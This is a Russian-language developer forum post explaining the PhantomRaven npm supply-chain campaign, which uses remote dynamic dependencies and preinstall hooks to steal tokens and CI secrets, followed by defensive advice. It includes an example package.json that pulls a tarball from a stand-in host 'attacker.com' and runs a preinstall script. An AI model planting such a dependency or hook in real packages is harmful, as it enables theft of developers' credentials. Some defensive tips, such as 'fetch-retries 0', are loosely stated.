Перейти к содержанию
  • Лента
  • Категории
  • Последние
  • Метки
  • Популярные
  • Пользователи
  • Группы
Свернуть
exlends
Категории
  1. Главная
  2. Категории
  3. Языки программирования
  4. JavaScript
  5. PhantomRaven в npm 2026: как RDD-атаки крадут токены и бьют по цепочке поставок

PhantomRaven в npm 2026: как RDD-атаки крадут токены и бьют по цепочке поставок

Запланировано Прикреплена Закрыта Перенесена JavaScript
phantomravenrddnpm security
1 Сообщения 1 Постеры 1 Просмотры
  • Сначала старые
  • Сначала новые
  • По количеству голосов
Ответить
  • Ответить, создав новую тему
Авторизуйтесь, чтобы ответить
Эта тема была удалена. Только пользователи с правом управления темами могут её видеть.
  • hannadevH Не в сети
    hannadevH Не в сети
    hannadev
    написал отредактировано
    #1

    Обложка: PhantomRaven в npm 2026: защита от Remote Dynamic Dependencies атак на цепочку поставок

    PhantomRaven - это свежая волна атак на npm, где злоумышленники маскируют вредоносный код через Remote Dynamic Dependencies. Пакеты выглядят чистыми, но при установке тянут payload с внешних серверов. Защищаться нужно срочно - теряются npm-токены, GitHub-ключи и CI/CD-секреты.

    Эта техника бьет по цепочке поставок, обходя сканеры безопасности. В 2026 году выявили новые волны с 88+ пакетами. Разработчики по всему миру уже пострадали - больше 86 тысяч установок. Пора разбираться, как это работает и как фиксить.

    Что такое PhantomRaven и RDD-механизм

    PhantomRaven - кампания атак на цепочку поставок в npm. Злоумышленники публикуют пакеты с нулевыми зависимостями, но в package.json вместо версии dep’а вписывают HTTP-URL. При npm install пакет-менеджер сам тянет код с сервера атакующего - это и есть Remote Dynamic Dependencies (RDD).

    Пакеты кажутся benign: просто hello-world скрипт. Но во время установки срабатывает preinstall-хук, который запускает скачанный payload. Никто не видит вредоносный код в реестре - сканеры типа npm audit пропускают. Первая волна стартовала в октябре 2025, а в 2026 добавились три новые с 88 пакетами. Атакующий ротирует домены, и каждый install тянет свежий код без кэша и lock’а.

    Кампания крадет данные из env, git-config и CI-систем. Примеры пакетов: petstore-integration-test, где версии эволюционировали от простого malware к RDD. Endor Labs нейтрализовали сбор данных без апдейтов в npm - круто, но проблема в слепых зонах инструментов.

    Вот как выглядит типичный package.json с RDD:

    {
      "name": "fake-package",
      "version": "1.0.0",
      "dependencies": {
        "malicious-dep": "https://attacker.com/payload.tgz"
      },
      "scripts": {
        "preinstall": "node sneaky-script.js"
      }
    }
    
    • RDD прячет payload: npm тянет tarball с внешнего URL, не проверяя реестр.
    • Авто-выполнение: preinstall-хук запускается всегда, даже в глубоких deps.
    • Нет версионирования: каждый install - новый код от атакующего.
    • Обход сканеров: статический анализ видит 0 deps, audit проходит.
    • Цели кражи: npm tokens, GitHub creds, CI/CD secrets из env vars.
    Аспект Обычные deps RDD в PhantomRaven
    Место кода npm реестр Внешний сервер
    Видимость Полная Невидима для сканеров
    Кэш/lock Да Нет, свежий каждый раз
    Выполнение Только runtime Preinstall на install

    Как payload крадет данные в PhantomRaven

    Payload в PhantomRaven - это бэкдор ~28KB для x64 с анти-анализом и C2 через BNB Smart Chain. Он сканирует среду: ищет email в env, git config, npmrc. Собирает токены из GitHub Actions, GitLab CI, Jenkins, CircleCI.

    Малварь использует lifecycle hooks npm для stealth. Нет явного кода в пакете - всё динамически. Атакующий меняет endpoints, но паттерны повторяются: сбор creds -> эксфильтрация на C2. В новых волнах пакеты генерятся AI для правдоподобных имён - разработчики клюют на знакомые названия.

    Пример кражи: скрипт парсит process.env на GITHUB_TOKEN, NPM_TOKEN. Потом пушит на attacker server. Koi Security первыми заметили в 2025 - 126 пакетов, 86k downloads. В 2026 эволюционировало: больше пакетов, лучше маскировка.

    Ключевые фичи payload:

    • Сканирование env vars: Авто-поиск токенов без хардкода.
    • Анти-анализ: Обфускация, многоступенчатая доставка.
    • C2 через crypto: BNB Smart Chain для эксфильтрации.
    • Гибкость: Атакующий меняет код на лету по User-Agent.
    • Масштаб: 88 пакетов в новых волнах, ротация аккаунтов npm.
    Волна Пакетов Downloads Новинки
    1 (2025) 126 86k+ Базовый RDD
    2-4 (2026) 88 Неизвестно AI-имена, ротация

    Защита от RDD-атак в цепочке поставок

    Стандартные инструменты слепы к RDD: npm audit, Snyk не тянут внешние URL. Нужно блокировать network calls на install и в CI. Включи npm config set fetch-retries 0 или proxy с фильтрами. Используй lockfile строго - но RDD их игнорирует.

    В CI/CD: air-gapped builds, deny-net правила. Скань preinstall скрипты вручную или либой типа socket-lint. Мониторь свежие пакеты с низким score. Endor Labs показали: коллаборативный блок без апдейтов реестра работает.

    Переходи на pinned deps и bundle analysis. Для фронта/ноды: socket shrinkwrap для полной картины. Регулярно ротируй токены - это must-have после PhantomRaven.

    Практические шаги:

    • npm ci вместо install: Строго по lockfile, меньше динамики.
    • Блокируй lifecycle scripts: npm config set ignore-scripts true.
    • Скань внешние deps: Либы типа supply-chain-defender или custom proxy.
    • Мониторинг env: Secrets scanning в CI, как GitHub Advanced Security.
    • Аудит новых deps: Только trusted publishers, score >90.
    Инструмент Защищает от RDD? Плюсы Минусы
    npm audit Нет Бесплатно Слепо к URL
    Socket.dev Частично AI-детект Платно
    Endor Labs Да Коллаб Enterprise

    Почему PhantomRaven меняет правила игры

    PhantomRaven показал дыры в npm: динамические deps - слепая зона для всех. Атакующие эволюционируют быстрее девайсов - AI генерит пакеты, ротация infra. В 2026 это не разовая акция, а ongoing threat с новыми волнами.

    Осталось копать: как AI усиливает typosquatting и что с другими менеджерами вроде pnpm/yarn. Подумай о full supply-chain visibility - от dev машины до prod. Традиционные сканеры устаревают, пора к runtime protection и behavioral analysis.

    1 ответ Последний ответ
    0

    Здравствуйте! Похоже, вас заинтересовала эта беседа, но у вас ещё нет аккаунта.

    Надоело каждый раз пролистывать одни и те же посты? Зарегистрировав аккаунт, вы всегда будете возвращаться на ту же страницу, где были раньше, и сможете выбирать, получать ли уведомления о новых ответах (по электронной почте или в виде push-уведомлений). Вы также сможете сохранять закладки и ставить лайки постам, чтобы выразить свою благодарность другим участникам сообщества.

    С вашими комментариями этот пост мог бы стать ещё лучше 💗

    Зарегистрироваться Войти

    Категории

    • Главная
    • Новости
    • Фронтенд
    • Бекенд
    • Языки программирования

    Контакты

    • Сотрудничество
    • info@exlends.com

    © 2024 - 2026 ExLends, Inc. Все права защищены.

    Политика конфиденциальности
    • Войти

    • Нет учётной записи? Зарегистрироваться

    • Войдите или зарегистрируйтесь для поиска.
    • Первое сообщение
      Последнее сообщение
    0
    • Лента
    • Категории
    • Последние
    • Метки
    • Популярные
    • Пользователи
    • Группы